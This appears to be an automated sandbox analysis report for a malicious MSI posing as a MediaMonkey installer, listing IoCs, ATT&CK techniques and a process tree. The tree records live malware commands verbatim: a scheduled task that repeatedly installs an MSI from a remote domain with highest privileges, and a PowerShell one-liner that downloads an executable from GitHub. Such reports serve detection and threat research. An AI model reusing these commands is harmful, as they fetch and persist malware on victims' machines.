8306ac8c8238290885ea335365248c0ca13f5119a7eec7b030721b1a62a33f3a

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
23	raw.githubusercontent.com

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{3C87D5B6-CEF8-42D1-BB65-FACD37298A05}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID84F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID8DC.tmp	msiexec.exe
File created	C:\Windows\Installer\e57d6a9.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57d6a9.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Loads dropped DLL 1 IoCs

pid	Process
2744	MsiExec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3084	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000c9712a8ab103c3e30000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000c9712a8a0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900c9712a8a000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dc9712a8a000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000c9712a8a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4408	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
3272	msiexec.exe
3272	msiexec.exe
3084	powershell.exe
3084	powershell.exe
4332	msedge.exe
4332	msedge.exe
1016	msedge.exe
1016	msedge.exe
3084	powershell.exe
3084	powershell.exe
4580	identity_helper.exe
4580	identity_helper.exe
3084	powershell.exe
3084	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4432	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4432	msiexec.exe
Token: SeSecurityPrivilege	3272	msiexec.exe
Token: SeCreateTokenPrivilege	4432	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4432	msiexec.exe
Token: SeLockMemoryPrivilege	4432	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4432	msiexec.exe
Token: SeMachineAccountPrivilege	4432	msiexec.exe
Token: SeTcbPrivilege	4432	msiexec.exe
Token: SeSecurityPrivilege	4432	msiexec.exe
Token: SeTakeOwnershipPrivilege	4432	msiexec.exe
Token: SeLoadDriverPrivilege	4432	msiexec.exe
Token: SeSystemProfilePrivilege	4432	msiexec.exe
Token: SeSystemtimePrivilege	4432	msiexec.exe
Token: SeProfSingleProcessPrivilege	4432	msiexec.exe
Token: SeIncBasePriorityPrivilege	4432	msiexec.exe
Token: SeCreatePagefilePrivilege	4432	msiexec.exe
Token: SeCreatePermanentPrivilege	4432	msiexec.exe
Token: SeBackupPrivilege	4432	msiexec.exe
Token: SeRestorePrivilege	4432	msiexec.exe
Token: SeShutdownPrivilege	4432	msiexec.exe
Token: SeDebugPrivilege	4432	msiexec.exe
Token: SeAuditPrivilege	4432	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4432	msiexec.exe
Token: SeChangeNotifyPrivilege	4432	msiexec.exe
Token: SeRemoteShutdownPrivilege	4432	msiexec.exe
Token: SeUndockPrivilege	4432	msiexec.exe
Token: SeSyncAgentPrivilege	4432	msiexec.exe
Token: SeEnableDelegationPrivilege	4432	msiexec.exe
Token: SeManageVolumePrivilege	4432	msiexec.exe
Token: SeImpersonatePrivilege	4432	msiexec.exe
Token: SeCreateGlobalPrivilege	4432	msiexec.exe
Token: SeBackupPrivilege	4596	vssvc.exe
Token: SeRestorePrivilege	4596	vssvc.exe
Token: SeAuditPrivilege	4596	vssvc.exe
Token: SeBackupPrivilege	3272	msiexec.exe
Token: SeRestorePrivilege	3272	msiexec.exe
Token: SeRestorePrivilege	3272	msiexec.exe
Token: SeTakeOwnershipPrivilege	3272	msiexec.exe
Token: SeRestorePrivilege	3272	msiexec.exe
Token: SeTakeOwnershipPrivilege	3272	msiexec.exe
Token: SeRestorePrivilege	3272	msiexec.exe
Token: SeTakeOwnershipPrivilege	3272	msiexec.exe
Token: SeDebugPrivilege	3084	powershell.exe
Token: SeBackupPrivilege	2072	srtasks.exe
Token: SeRestorePrivilege	2072	srtasks.exe
Token: SeSecurityPrivilege	2072	srtasks.exe
Token: SeTakeOwnershipPrivilege	2072	srtasks.exe
Token: SeBackupPrivilege	2072	srtasks.exe
Token: SeRestorePrivilege	2072	srtasks.exe
Token: SeSecurityPrivilege	2072	srtasks.exe
Token: SeTakeOwnershipPrivilege	2072	srtasks.exe
Token: SeRestorePrivilege	3272	msiexec.exe
Token: SeTakeOwnershipPrivilege	3272	msiexec.exe
Token: SeRestorePrivilege	3272	msiexec.exe
Token: SeTakeOwnershipPrivilege	3272	msiexec.exe
Token: SeRestorePrivilege	3272	msiexec.exe
Token: SeTakeOwnershipPrivilege	3272	msiexec.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
4432	msiexec.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
4432	msiexec.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3272 wrote to memory of 2072	3272	msiexec.exe	92
PID 3272 wrote to memory of 2072	3272	msiexec.exe	92
PID 3272 wrote to memory of 2744	3272	msiexec.exe	94
PID 3272 wrote to memory of 2744	3272	msiexec.exe	94
PID 3272 wrote to memory of 2744	3272	msiexec.exe	94
PID 2744 wrote to memory of 4372	2744	MsiExec.exe	95
PID 2744 wrote to memory of 4372	2744	MsiExec.exe	95
PID 2744 wrote to memory of 4372	2744	MsiExec.exe	95
PID 4372 wrote to memory of 3688	4372	cmd.exe	97
PID 4372 wrote to memory of 3688	4372	cmd.exe	97
PID 4372 wrote to memory of 3688	4372	cmd.exe	97
PID 3688 wrote to memory of 1892	3688	cmd.exe	98
PID 3688 wrote to memory of 1892	3688	cmd.exe	98
PID 3688 wrote to memory of 1892	3688	cmd.exe	98
PID 1892 wrote to memory of 3792	1892	net.exe	99
PID 1892 wrote to memory of 3792	1892	net.exe	99
PID 1892 wrote to memory of 3792	1892	net.exe	99
PID 3688 wrote to memory of 4408	3688	cmd.exe	100
PID 3688 wrote to memory of 4408	3688	cmd.exe	100
PID 3688 wrote to memory of 4408	3688	cmd.exe	100
PID 4372 wrote to memory of 1016	4372	cmd.exe	101
PID 4372 wrote to memory of 1016	4372	cmd.exe	101
PID 4372 wrote to memory of 3084	4372	cmd.exe	102
PID 4372 wrote to memory of 3084	4372	cmd.exe	102
PID 4372 wrote to memory of 3084	4372	cmd.exe	102
PID 1016 wrote to memory of 1544	1016	msedge.exe	103
PID 1016 wrote to memory of 1544	1016	msedge.exe	103
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105
PID 1016 wrote to memory of 5116	1016	msedge.exe	105

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4432

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3272
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2072
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3DD9B755726C2317F9BD1E5CF3F69ED3
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\\MediaMonkey_4.1.21.1873\run.cmd" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4372
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "inst.cmd"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3688
    - - C:\Windows\SysWOW64\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1892
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:3792
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "BVRKIPTS-7003" /tr "msiexec /ihttps://anicesicerom.com/1809814840 /q" /sc minute /mo 140 /rl highest /f
        5⤵
        Creates scheduled task(s)
        
        PID:4408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://player.go-mediamonkey.org/
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:1016
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9460546f8,0x7ff946054708,0x7ff946054718
        5⤵
        
        PID:1544
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
        5⤵
        
        PID:5116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4332
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
        5⤵
        
        PID:2888
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        5⤵
        
        PID:3700
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
        5⤵
        
        PID:1176
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
        5⤵
        
        PID:4968
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
        5⤵
        
        PID:3068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
        5⤵
        
        PID:3064
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
        5⤵
        
        PID:456
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 /prefetch:8
        5⤵
        
        PID:5072
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4580
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
        5⤵
        
        PID:5148
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
        5⤵
        
        PID:5408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2896 /prefetch:1
        5⤵
        
        PID:5896
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
        5⤵
        
        PID:5540
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "$dl = New-Object System.Net.WebClient;$dl.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1)';$f = 'monkey_4.1.21.1873.exe'; $dl.DownloadFile('https://raw.githubusercontent.com/pavelenko/Media/master/MediaMonkey_4.1.21.1873.exe', $f);Stop-Process -Name powershell"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3084

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4596

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4892

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

Persistence

Scheduled Task/Job

Privilege Escalation

Scheduled Task/Job

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery